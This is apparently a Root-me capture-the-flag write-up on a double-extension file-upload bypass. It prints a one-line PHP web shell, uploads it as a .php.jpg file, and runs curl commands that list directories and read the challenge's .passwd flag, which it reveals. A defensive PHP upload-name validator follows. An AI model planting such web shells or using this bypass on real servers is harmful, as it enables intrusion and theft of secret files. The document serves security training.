Root-me

File Upload - Double Extensions

Our goal is to upload PHP code and get access to the .passwd file.

Since the title already tells us what to do, we’ll upload a PHP file that will allow us to execute commands on the system.

<?php if($_GET['cmd']) { system($_GET['cmd']); } ?>

We’ll name it mine.php.jpg and upload it. Once it is uploaded, we’ll retrieve the link where it was uploaded and send our commands.

It would look something like this.

curl http://challenge01.root-me.org/web-serveur/ch20/galerie/upload/randomsomething/Double_extensions.php.jpg?cmd=ls

Double_extensions.php.jpg

randomsomething will be a random string generated by the upload script. We can see that our ls command was executed and gave us the contents of the folder. Now it’s just a matter of finding the file .passwd and reading it.

curl http://challenge01.root-me.org/web-serveur/ch20/galerie/upload/aau41u6lqc9s13gmamjv2e5722/Double_extensions.php.jpg?cmd=ls%20-lah%20../../../

total 40K
drwxr-s---  4 web-serveur-ch20 www-data  4.0K Jun 13 17:13 .
drwxr-s--x 56 challenge        www-data  4.0K Sep 13 10:22 ..
-r-x------  1 challenge        challenge  666 Jan 14  2017 ._init
-r--------  1 challenge        challenge  274 Nov 16  2014 ._nginx.http-level.inc
-r--------  1 challenge        challenge  904 Feb 27  2017 ._nginx.server-level.inc
-r--------  1 challenge        challenge  645 Nov 11  2016 ._php-fpm.pool.inc
-r--------  1 web-serveur-ch20 www-data    26 Dec 21  2016 .passwd
drwxr-s---  8 web-serveur-ch20 www-data  4.0K Jun 24  2015 galerie
-rw-r-----  1 web-serveur-ch20 www-data  3.9K Nov 11  2016 index.php
drwxrwxrwx  2 web-serveur-ch20 www-data  4.0K Nov 11 17:01 tmp

Found the file; we needed to go back up 3 folders. Now let’s run cat on it.

curl http://challenge01.root-me.org/web-serveur/ch20/galerie/upload/aau41u6lqc9s13gmamjv2e5722/Double_extensions.php.jpg?cmd=cat%20../../../.passwd

Gg9LRz-hWSxqqUKd77-_q-6G8
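
The defensive counterpart to the upload above, as an added example that is not the challenge's code or part of the original write-up: a filename check that inspects every dot-separated segment instead of only the last one, and stores accepted files under a server-generated name. The function name, the allowlist and the script-extension list are assumptions chosen for illustration.

```php
<?php
// Added example (hypothetical helper, not the challenge's upload script).
// Both lists below are assumptions; adjust them to what the server can execute.
const ALLOWED_FINAL = ['jpg', 'jpeg', 'png', 'gif'];
const SCRIPT_EXTS   = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'pht'];

/**
 * Returns a server-generated storage name for an accepted upload,
 * or null when the client-supplied name must be rejected.
 */
function safe_upload_name(string $clientName): ?string
{
    // Strip any path component, then split on every dot, not just the last.
    $base  = strtolower(basename(str_replace('\\', '/', $clientName)));
    $parts = explode('.', $base);
    if (count($parts) < 2 || $parts[0] === '') {
        return null;                       // no extension, or a dotfile
    }
    $final = array_pop($parts);
    if (!in_array($final, ALLOWED_FINAL, true)) {
        return null;                       // last extension is not an image type
    }
    array_shift($parts);                   // drop the stem, keep the inner segments
    foreach ($parts as $segment) {
        if (in_array($segment, SCRIPT_EXTS, true)) {
            return null;                   // e.g. "x.php.jpg"
        }
    }
    // Never reuse the client's name on disk: random stem + vetted extension.
    return bin2hex(random_bytes(16)) . '.' . $final;
}

// Constructed sample names, including the one used in this write-up.
$samples = ['holiday.jpg', 'Double_extensions.php.jpg', 'a.PHTML.png',
            'shell.php', '.htaccess', 'v1.2.png'];
foreach ($samples as $name) {
    $stored = safe_upload_name($name);
    printf("%-28s %s\n", $name, $stored === null ? 'REJECTED' : "stored as $stored");
}
```

Only holiday.jpg and v1.2.png are accepted. Because the stored name is regenerated, the inner-segment check is defence in depth and a useful signal to log; the upload directory should also be configured so the server never hands its contents to the PHP interpreter.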